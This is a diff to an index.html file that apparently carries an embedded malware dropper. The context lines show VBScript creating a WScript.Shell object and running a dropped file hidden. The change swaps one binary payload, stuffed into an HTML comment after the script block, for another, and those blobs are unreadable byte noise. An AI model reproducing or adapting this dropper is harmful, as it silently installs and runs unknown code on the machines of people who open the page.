--- a/index.html
+++ b/index.html
@@ -23,6 +23,5 @@ FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
-//--></SCRIPT><!--ö‘xÕút~ö4çH›>.¦„ákbµ>È“Ü~²
-Ÿý€<¦8„Xn%¼a¬Ã|l´ì•/}Ë<ç(ˆ¾6v_”¯îË@=³>Â	AÅ‹â+€QÄœ7ØÌ¦„„_…hîÌ6¢ÖÎ¹
-) À"qÊ¬ºµ«–E¤=êöa~f“*yƒ¹àó…ÄRÑ{ø`óí¨è=Ò³ªÐ%šª£Å£45å]€§­ˆZÓßâu,JQqÐìº£èw3W^M{–VñÓòÓ]ý0\Ùû78Ý´Ýo9:ùï9BZmA-ÁZì‘jÕK€Æ`¨òuÁdui¾éœsjØ0xÃ@ÜbW9Èâð\?0÷•Ã¶há&„›É¸§|×“mQáµ‰ç^N°´iœá>œ‚†ÝùGÁSXWHš•é0ÛKlÆ$Ávòf¬†¤’:¼BÏ:Ñ3>y]ª¢"îˆ^Â!TájM:1v³Lä‡H¶lˆçwãçÂÜ Ž,i¥òæçbsßãä âŸ—£|ð³*ÕívRÌïµ¨-g8WÞõN6[§ïïýÉ:Ì¥¢FŽÕíÜ&	ˆ<Ÿk6˜Ë,Íp`cÕÇ’÷r½†´rTŠ­‡}tê § ÕšRûÕšÕšÕš˜GM!Q/_ƒÕš Õš-->
+//--></SCRIPT><!--¦]ËX»¨{F­õ†ý2ùäÃ¯¦61ØÊÜ€ÍË$ëãjNSºVœÝj£’:Zˆ!Æ‡b,!€ ë$”–óYê=£ËlL¿1Â›ÅYc™Æ"OØ@x,ŸÔ»ÍôØ °/+:™D}‘è4e•rÒc×DITNÚ¾Ž<#!ûþs±œˆ†T7t­»X¶{xŸððG¦y{àVºÚ›Í9	hkº‰èKÑ
+rîí‹A¹ZiãÖc†ãÂ]…ÃXpö8ØPÀ¨ƒ)Å>Ç“±µ?Š·L¶uQ¹;âö_ûì[ÈÚŽ ué©0é8´„{¸A:SY3`|g»'Ñ#ìLá„z6 ¤ÛpŸr„UaDðDãÅv/¹Ò®íéj¡²âÐÉ‹ÆX?^56 ½XòÆPY—Î÷òFh!§Íïžò¶&°yd_ `Û…•D7wVŸÜŽç\Ç·¤S3‡tLx&Ì3˜>Í´+£> '»Nù>îÎjˆÞµ8Š Ú’Ÿ/K,ËÍµ‘j«É‰t²@wìçkTÝp[¸ýJ ÕšRûÕšÕšÕš˜GM"Q/_ƒÕš Õš-->
